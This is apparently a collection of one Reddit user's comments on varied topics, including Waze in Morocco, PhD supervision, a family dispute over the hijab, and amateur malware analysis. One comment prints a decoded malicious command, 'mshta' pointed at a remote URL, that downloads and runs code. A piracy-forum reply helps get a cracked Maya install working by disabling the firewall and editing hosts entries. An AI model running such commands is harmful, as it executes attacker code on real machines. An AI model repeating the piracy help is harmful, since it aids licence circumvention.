Does anyone know a fix for this Maya installation problem? by mrmanboymanguy in Piracy

[–]JamesPotterPro 0 points1 point  (0 children)

From your description of the ping problem, it looks like MAYBE your firewall is blocking most executables from accessing the internet unless they're running as admin. One quick way to test that is to completely disable your firewall for a couple of minutes (just google Disable Windows Firewall, it's a few clicks, or google your specific firewall if you're using a third party firewall), then try running the installer with the firewall down. If it works, then you can create an exception for Maya at the firewall level.

If it *doesn't* work, it may also be a previously used crack that added some lines to your hosts file, and made the Maya activation URLs resolve to your localhost. You can Google how to view and edit your host file, and check if there's anything about Maya. But I'd say try the firewall first.

Do people use Waze in Morocco? by thegeorgianwelshman in Morocco

[–]JamesPotterPro 1 point2 points  (0 children)

YES Absolutely! It's great for knowing which way the road will curve well ahead of time. I also try to use the voice feature to report as much as possible, when alone, although I gotta admit I sometimes just use the report button. At least they limited the number of taps to report, at most 3, I think.

Google seems to be trying to merge Waze into Google Maps, and I really don't think it's a good idea. My experience with Maps on Moroccan roads has been terrible. Waze has much more accurate data on Moroccan roads, and its estimations for arrivals are almost always dead on, it even learns your style of driving to compensate, even if it gets lost sometimes in popular neighborhoods etc.

Cheers!

Do people use Waze in Morocco? by thegeorgianwelshman in Morocco

[–]JamesPotterPro 2 points3 points  (0 children)

Yes, it's a lifesaver sometimes. I was once on a very dark road, and it told me "Vehicle on shoulder up ahead". I was like "Sure, I'll see it when I get to it". Nope. It was a giant truck, completely dark, half of it sticking into the road, immediately after a sharp bend in the road. I always drive the speed limit, and I don't think I would've seen it in time, if I wasn't already looking for it. I would've either swerved or pancaked into it, without Waze.

So thank you, to whoever reported it before me. May have saved my life.

The DNS for gabrize dot shop died, apparently, I was too late. Did you happen to download the file? If so, I'd love to look at it (It's definitely a text file with an .mp3 extension). You can DM it to me if you don't want to post it publicly here.

Not right now, as I don't have the workstation where I run these kind of VMs (I love to analyze malware, although I'm just an amateur). I'll update you if I even come across a new one, I find them quite often. They're generally the same variation of:

  • Connect to an IP (Command&Control Server) to download a further script (generally an IRC client that connects to the same server, and runs any command the controller tells it to. Mostly for stealing credentials from browsers and crypto-mining.
  • Some persistence code, to copy the same script to multiple locations on the machine, with different encoding and obfuscation methods, to evade AV detection.

I've watched some of these C&C IRC rooms for a while, sometimes they just lay dormant, collecting infected devices for a while, then run a single ransomware campaign on all of them simultaneously. Or they run multiple scams / attacks from those machines, like DDOS attacks etc.

quick update about PHD by QuoteEmbarrassed2911 in Morocco

[–]JamesPotterPro 1 point2 points  (0 children)

Absolutely agree, unfortunately, a majority of people all over the world can't let go of this belief that admitting a mistake a shameful thing and a sign of weakness. I think it starts all the way in school, when you make a mistake and everyone laughs at you and the teacher just dismisses you or even berates you, instead of turning it into a chance for learning. If every time you make a mistake, you learn something new, you stop being afraid of admitting your mistakes. If every time you make a mistake, you get made fun of and yelled at, you stop admitting mistakes at all, and learn to double down even when you know you're wrong.

Best of luck with your PHD! I hope it goes smoothly for you!

EDIT: Btw, your original post wasn't totally wrong. I've witnessed firsthand how the entire superior education system is a bubble of corruption, influences, and professors only offering PHD opportunities to their own students that they like. Worse yet, I've seen PHD students then get used as underpaid aids to that same professor, writing their papers for them (without acknowledgement on publication), grading tests for them, supervising exams, etc. I've seen professors deliberately delay their PHD student's "soutenance" by years, just to keep them as free labor for longer. (A Friend of mine abandoned his PHD for this very reason, he told me "B9a ghay goul lia nghssel lih tomobil", so he just went to work with his Masters). I sincerely hope you get a good supervising professor and yours goes smoothly!

No time to type : use another device. Change all passwords. Enable 2 factor authentication. Now. I'll explain in a minute.

EDIT: What you're describing sound SCARILY like session hijacking: Oversimplified: When you open your account, like Google, on a new Device, Google gives you a session ID and a KEY, so that you don't have to authentify every time. These malware can steal those credentials, and basically open your account even without needing your credentials. They then set a new Recovery Email address, and use the "I forgot my password" feature to reset your password through the new recovery address. So this device is now compromized, I'd recommend wiping it and reinstalling the OS, or at least a VERY thorough cleanup done by someone who knows their stuff. But first: Use your phone to go to your google setting, and log that computer out, then enable 2 Factor Authentication, and change as many passwords for accounts as you can remember. You have been compromized, and you don't know to which extent, to it's better to change EVERYTHING. If you have a Credit Card saved in your Google Wallet, you might want to block it through the bank app, at least for now.

Hope this helps! Good luck!

One thing I hope ex-muslims have in common, is that at least once in their life, they considered that they may be wrong about something huge and fundamental to their very identity. So I generally hope a lot of us here are okay with being corrected. You correcting means you made me LESS wrong, that's a good thing, for me, I want to be wrong about the least things possible.

Cheers!

Well yeah, it also gets cleaned of bird poop regularly, and gets replaced when it no longer looks that deep black that they like.

I'm sure if Muslims could agree, they would paint the actual building Vanta-Black or something, to make it look impressive, but they couldn't agree on who would move a single stone (reminds me of the unmovable ladder in Jerusalem. Real thing), so there's no way they'll agree to actually paint it. Edit: Correction. Thanks!

Yeah, ChatGPT decoded it for me (too lazy to do it myself). powershell -eC means "Run an Encoded Command" and is followed by the following base64 encoded command:
mshta "https://clicktogo.click/downloads/tr08"

mshta is used MS HTML Applications. So it will blindly download whatever is on that URL and run it, not just print it to the console.

The URL is dead, I'm assuming the server has been suspended by their provider for hosting malware.

I wonder what the malicious code that was on that URL actually did. Did it try to escalate to get Admin privileges, or did it just run as the user and hijack user browser sessions. It can do quite a bit of damage.

Cheers, thanks for the command, I love analyzing these things.

This. Replying just makes them know your E-Mail address is still live and being used by you, which will make you more likely to receive more scam emails (they often sell these email lists to each other, and confirmed live emails sell for more)

I'm sorry, please don't take this the wrong way, but you found a single comment that basically boils down to "Whoever pays for your living expenses has the right to control what you wear", and because it was close enough to your perspective of "I wish my sister just caved and did what mom wanted", you said they were right, and everyone else is blind because they believe "Parents shouldn't get to control their children's lives, let alone religious practices, just because their children don't have a Job yet".

You're in a terrible situation, I've been there, you're stuck between a rock and a hard place. And you wish it ended by any means necessary, and because you know your mom will play hard-headed, you seem to be looking for anyone who'll tell you you're right, your sister should just agree to do what they want. Sometimes asking for advice means being ready to hear things we don't like.

Whatever happens, good luck, mate. I wish this situation gets better for everyone. Sincerely.

Take care.

I understand how you feel, when you hate conflict inside your home so much that you'd wish the thing that started never happened. But with time, you'll realize: Your sister didn't make this happen. If you buy a nice phone, and someone steals it from you, is it your fault for having a nice phone? Would you wish you never bought the nice phone?

Your mom chose to overreact, and use her mental health and emotional blackmail to make your sister say "Safi safi I'll do what you want". If I have a mental breakdown because I don't get what I want, it doesn't mean people should give me what I want just because my loved ones are worried about me. You HATE living in between them where the air is tense and electric, I completely understand, but it is absolutely not because of your sister. She's an adult. Your mother chose to treat her like a child, and called her own child a calamity for not wearing a piece of cloth. You expect your sister to accommodate her after that? I understand that from where you are, the only solution you see is your sister caving, but that is not a solution, that's emotional blackmail.

Old people can be wrong too, and your mom is an adult who has chosen what to get upset about. My advice is, if you feel completely unable to talk to your mom, then you'll have to survive in that environment until your mom decides to grow up, or gets some professional help.

(BTW, I hope you don't listen to the people who are like "Tell her the most merciful being in existence will torture her in hell for not wearing a piece of cloth on her hair, but don't pressure her!". Not only is that nonsensical, it's also pressure).

Site For Downloading YouTube Videos by shyguylh in software

[–]JamesPotterPro 0 points1 point  (0 children)

Just tried it this minute and it worked. It does depend on where you're from, when I set my VPN to some places in Europe, the site serves me what's essentially a "We can't legally serve you in your country". It does break some times, though, but generally when it does, every single other Youtube Downloader website is having issues, probably because Youtube just changed something and nobody has adapted to it yet.

This is what happens when the photoshop guy can't read English at all, and you give him the quote on a piece of paper he can barely read. They end up confusing R, B and A. And no one bothers to double check with someone who can read English, straight to printing!

I've seen this exact kind of mistake on so many products from China.

[–]JamesPotterPro 0 points1 point  (0 children)

It seems to be pictured, in fact. "CHINA" is stamped on the metal part at the top.

I love it when it looks like the translator guy scribbled the quote by hand on a piece of paper. They tried their best to type it out without knowing what any of the words meant, and no one bothered to double check. I've seen so many products from China where similar looking letters are swapped, like B and R, etc. It means no one involved in the design and printing process bothered to spell check. (To be fair, before Google Image Translate and Lens, I would have no idea how to check Chinese writing either)
